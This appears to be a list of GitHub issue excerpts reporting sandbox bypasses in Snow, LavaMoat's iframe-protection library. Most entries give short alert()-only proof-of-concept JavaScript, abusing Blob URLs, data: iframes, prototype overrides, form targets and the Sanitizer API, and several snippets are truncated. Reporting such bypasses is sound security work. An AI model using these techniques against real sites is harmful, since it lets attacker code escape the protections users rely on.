snow
Use Snow to finally secure your web app's same origin realms!
In order to prevent Blob URIs from being created within workers, snow overrides the `Worker` constructor using the following code:

```js
const native = win.Worker;
win.Worker = function Worker(aURL, options)...
```
Snow overrides the `URL.createObjectURL` function to only allow creation of Blob URLs if the blob type is included in a specific whitelist that Snow keeps. However, if the blob isn't...
```js
var url = URL.createObjectURL(new Blob(['alert(window.origin)']))
var x = document.createElement('iframe');
x.srcdoc = ``
document.body.appendChild(x);
```
Reproduce by running

```javascript
let i = document.createElement('iframe');
i.srcdoc="";
document.body.append(i)
setTimeout(x=>i.contentWindow[0].alert(1337),500)
```
Reproduce by running

```javascript
let x = document.createElement('iframe')
x.src='data:text/html,'
document.body.appendChild(x)
setTimeout(()=>{
  x.contentWindow[0].alert.call(window, 'hi')
},500)
```

honestly not sure how you'd fix this
The code for checking if the extended element is framable doesn't make sure that the value is a string (alternatively, that the value checked is the same value that is...
## PoC:

```js
// get the original ArrayIterator.prototype.next method
var next = [].values().__proto__.next;
// overwrite the method
[].values().__proto__.next = function(){
  var x = next.call(this);
  var win = x?.value;
  // leak...
```
PoC:

```js
Object.defineProperty(NodeList.prototype, 'length', {value:0});
document.body.innerHTML = '';
iframe.alert(1337);
```

Vulnerable path:

1. `getFramesArray` called in https://github.com/LavaMoat/snow/blob/1c8faa81291e6f6dffe62b7106eff2492213375d/src/inserters.js#L29
2. `slice()` called on the results from `querySelectorAll` in https://github.com/LavaMoat/snow/blob/1c8faa81291e6f6dffe62b7106eff2492213375d/src/utils.js#L111-L113 produces an empty...
```javascript
setInterval(x=>xyz.alert(1337),0);
i=document.createElement('iframe');
i.name='xyz';
f=document.createElement('form');
b=document.createElement('button');
b.formTarget='xyz';
b.formAction='1';
f.append(b);
document.body.append(f);
document.body.append(i);
b.click()
```
This is similar to #142 but I use the Sanitizer API to inject the meta tag

```javascript
i=document.createElement('iframe');
i.src=123;
i.name='xyz';
counter=0;
i.onload=x=>{
  i.contentDocument.body.setHTML('', {sanitizer:new Sanitizer({allowElements: [ "meta" ],allowAttributes:{"http-equiv":["meta"],"content":["meta"]}})});
  counter++;
  if(counter>1){
    i.onload=null;...
```